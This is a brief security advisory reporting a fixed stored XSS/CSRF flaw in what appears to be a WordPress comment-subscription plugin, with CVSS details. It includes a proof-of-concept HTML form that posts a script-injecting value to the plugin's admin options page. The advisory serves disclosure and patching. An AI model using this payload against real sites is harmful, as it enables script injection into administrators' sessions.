CVSS Summary
| Score | 6.8 Medium |
|---|---|
| Vector | Network |
| Complexity | Medium |
| Authentication | None |
| Confidentiality | Partial |
| Integrity | Partial |
| Availability | Partial |
Last revised:
This plugin contains a combination XSS/CSRF vulnerability. Because the XSS is stored, browsers like Chrome which implement anti-XSS measures are equally at risk.
Current state: Fixed
| Score | 6.8 Medium |
|---|---|
| Vector | Network |
| Complexity | Medium |
| Authentication | None |
| Confidentiality | Partial |
| Integrity | Partial |
| Availability | Partial |
Entice an administrative user to submit the following form:
<form action="http://localhost/wp-admin/admin.php?page=subscribe-to-comments-reloaded/options/index.php&subscribepanel=3" method="post"> <input type="text" name="options[manager_page]" id="manager_page" value=""><script>alert(1)</script>"> <input type="submit"> </form>
An alert will be displayed on this plugin’s settings page.
Upgrade immediately.